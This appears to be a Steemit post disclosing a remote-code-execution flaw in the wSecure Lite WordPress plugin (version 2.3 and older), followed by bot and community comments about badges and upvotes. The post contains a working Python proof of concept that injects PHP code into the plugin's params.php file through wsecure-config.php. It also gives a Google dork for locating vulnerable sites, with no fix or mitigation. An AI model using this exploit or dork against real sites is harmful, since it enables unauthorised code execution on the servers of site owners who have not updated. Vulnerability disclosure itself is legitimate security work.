[CRITICAL] Vulnerable RCE in wSecure Lite(Wordpress)
This vulnerability allows attackers to access the servers of all sites using version 2.3 of Wsecure or older with disabled "Magic Quotes" and don't require plugin be active. Plugin have more than 12000 downloads and 2000 activate installs.
Vulnerable file is wsecure-config.php. It gets your POST and allows write Executable code to params.php.
PoS on Python:
import requests
data = {'wsecure_action':'update','key':'','publish':'";\n public function __construct() { echo "Hello!"; }\n/','options':'','custom_path':'"/#"'}
site = "http://[wp-site]/wp-content/plugins/wsecure/wsecure-config.php"
res = requests.post(site, data=data)
print res.text
Version: 2.3 or older
Vendor Homepage: http://www.joomlaserviceprovider.com/
Google Dork: inurl: "/wp-content/plugins/wsecure/wsecure-config.php"
Congratulations @soft! You have received a personal award!
Click on the badge to view your Board of Honor.
Congratulations @soft! You received a personal award!
You can view your badges on your Steem Board and compare to others on the Steem Ranking
Vote for @Steemitboard as a witness to get one more award and increased upvotes!
Keep up the great work @soft
Upvoted
Nice @soft
Shot you an Upvote :)
Hi! This post has a Flesch-Kincaid grade level of 12.5 and reading ease of 36%. This puts the writing level on par with academic journals.